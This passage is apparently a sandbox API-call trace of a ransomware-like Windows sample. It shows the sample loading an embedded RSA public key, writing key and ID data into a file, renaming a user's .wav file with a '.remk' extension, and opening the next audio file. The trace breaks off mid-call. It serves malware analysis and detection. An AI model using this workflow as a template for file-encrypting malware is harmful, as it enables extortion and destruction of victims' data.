[0235.472] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.472] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.472] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0235.473] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0235.473] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0235.473] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0235.473] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0235.473] GetLastError () returned 0x0 [0235.473] CryptDestroyHash (hHash=0x31de170) returned 1 [0235.473] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0235.473] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0235.473] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0235.473] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0235.473] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0235.473] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1010) returned 0x37c6278 [0235.473] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0235.473] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0235.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0235.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0235.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0235.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325cd10 [0235.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eeaa8 [0235.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325cd58 [0235.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea90 [0235.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x325dda8 [0235.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x325ddc0 [0235.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x325ddd8 [0235.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0235.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0235.474] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0235.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0235.474] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dda8 | out: hHeap=0x630000) returned 1 [0235.474] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325ddd8 | out: hHeap=0x630000) returned 1 [0235.474] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325ddc0 | out: hHeap=0x630000) returned 1 [0235.474] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0235.474] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x325dda8 [0235.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0235.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x325ddc0 [0235.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0235.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x325ddd8 [0235.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0235.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0235.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0235.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0235.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0235.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0235.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0235.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0235.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325ddc0 | out: hHeap=0x630000) returned 1 [0235.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0235.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325ddd8 | out: hHeap=0x630000) returned 1 [0235.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0235.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dda8 | out: hHeap=0x630000) returned 1 [0235.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0235.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0235.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0235.475] GetCurrentThreadId () returned 0x314 [0235.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0235.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c47a0 [0235.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0235.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0235.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0235.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0235.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0235.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0235.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.476] GetCurrentThreadId () returned 0x314 [0235.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0235.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0235.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0235.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0235.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0235.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0235.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0235.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x325dda8 [0235.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0235.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0235.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0235.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0235.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0235.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0235.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0235.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x325ddc0 [0235.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0235.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0235.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0235.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0235.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0235.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x325ddd8 [0235.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0235.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0235.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0235.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x325ddf0 [0235.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0235.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x325de08 [0235.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0235.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0235.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x325de20 [0235.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x325de38 [0235.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0235.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x325de50 [0235.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325de38 | out: hHeap=0x630000) returned 1 [0235.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x325de38 [0235.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325de20 | out: hHeap=0x630000) returned 1 [0235.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0235.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0235.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0235.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0235.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325ddc0 | out: hHeap=0x630000) returned 1 [0235.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x325ddc0 [0235.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0235.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dda8 | out: hHeap=0x630000) returned 1 [0235.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0235.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325de50 | out: hHeap=0x630000) returned 1 [0235.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0db8 [0235.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0235.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x319bc40 [0235.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0235.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0235.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325ddc0 | out: hHeap=0x630000) returned 1 [0235.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37c0fd0 [0235.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0235.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31b6580 [0235.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0235.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0235.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0235.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6580 | out: hHeap=0x630000) returned 1 [0235.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0235.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0235.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0235.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0fd0 | out: hHeap=0x630000) returned 1 [0235.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0235.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0235.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325de38 | out: hHeap=0x630000) returned 1 [0235.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0235.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325de08 | out: hHeap=0x630000) returned 1 [0235.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0235.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325ddd8 | out: hHeap=0x630000) returned 1 [0235.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325ddf0 | out: hHeap=0x630000) returned 1 [0235.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0235.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0235.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0235.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eea90 | out: hHeap=0x630000) returned 1 [0235.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325cd58 | out: hHeap=0x630000) returned 1 [0235.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0235.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0235.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0235.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0235.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0235.480] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.480] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0235.480] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0235.480] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0235.480] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0235.480] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0235.480] WriteFile (in: hFile=0x640, lpBuffer=0x37c6278*, nNumberOfBytesToWrite=0x1003, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c6278*, lpNumberOfBytesWritten=0x3adfb14*=0x1003, lpOverlapped=0x0) returned 1 [0235.480] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c6278 | out: hHeap=0x630000) returned 1 [0235.480] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x1008, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.480] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0235.480] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.480] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0235.480] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0235.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0235.480] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37c0db8 [0235.480] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0235.480] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0235.480] WriteFile (in: hFile=0x640, lpBuffer=0x37c0db8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37c0db8*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0235.481] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0235.481] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.481] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0235.481] CloseHandle (hObject=0x640) returned 1 [0235.482] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0235.482] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8d0) returned 0x37bd408 [0235.482] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0235.482] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\-wYl9Wxaf_FQLu8dRQB5\\Hh6wUmsTzjoH.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\-wyl9wxaf_fqlu8drqb5\\hh6wumstzjoh.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\-wYl9Wxaf_FQLu8dRQB5\\Hh6wUmsTzjoH.wav.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\-wyl9wxaf_fqlu8drqb5\\hh6wumstzjoh.wav.remk")) returned 1 [0235.483] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0235.483] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.483] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0235.484] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0235.484] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81f5ff80, ftCreationTime.dwHighDateTime=0x1d5e7e4, ftLastAccessTime.dwLowDateTime=0xbc067840, ftLastAccessTime.dwHighDateTime=0x1d5e04a, ftLastWriteTime.dwLowDateTime=0xbc067840, ftLastWriteTime.dwHighDateTime=0x1d5e04a, nFileSizeHigh=0x0, nFileSizeLow=0x1353f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hj_q0gZo.mp3", cAlternateFileName="")) returned 1 [0235.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xee) returned 0x31a4298 [0235.485] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.485] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\-wYl9Wxaf_FQLu8dRQB5\\hj_q0gZo.mp3") returned=".mp3" [0235.485] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\-wYl9Wxaf_FQLu8dRQB5\\hj_q0gZo.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\-wyl9wxaf_fqlu8drqb5\\hj_q0gzo.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0235.485] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=79167) returned 1 [0235.485] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0235.488] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x13519, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.488] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0235.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.490] HeapFree (in: hHeap=0x630000, dwFlags=0x0, 